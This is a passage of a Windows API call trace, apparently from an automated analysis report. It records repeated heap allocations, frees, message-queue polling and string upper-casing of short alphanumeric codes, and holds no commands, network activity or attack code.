Size=0x10) returned 0x24aa8a8 [0206.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0206.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17426) returned 0x24c7a50 [0206.295] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0206.295] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.295] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0206.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0206.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0206.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0206.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17426) returned 0x24c7a50 [0206.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0206.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0206.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0206.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0206.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0206.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c18 [0206.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa098 [0206.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0206.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17426) returned 0x34d9688 [0206.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0206.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0206.299] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0206.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0206.300] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0206.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0206.300] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.300] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0206.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0206.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0206.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0206.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0206.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.301] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.302] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.303] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.303] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.303] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.303] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.304] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.304] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.304] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.304] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.304] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.304] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.305] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.305] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.305] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0206.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.306] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.306] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.306] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.306] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.307] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.307] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0206.307] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.308] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0206.308] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.308] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.308] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0206.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.308] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0206.308] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, 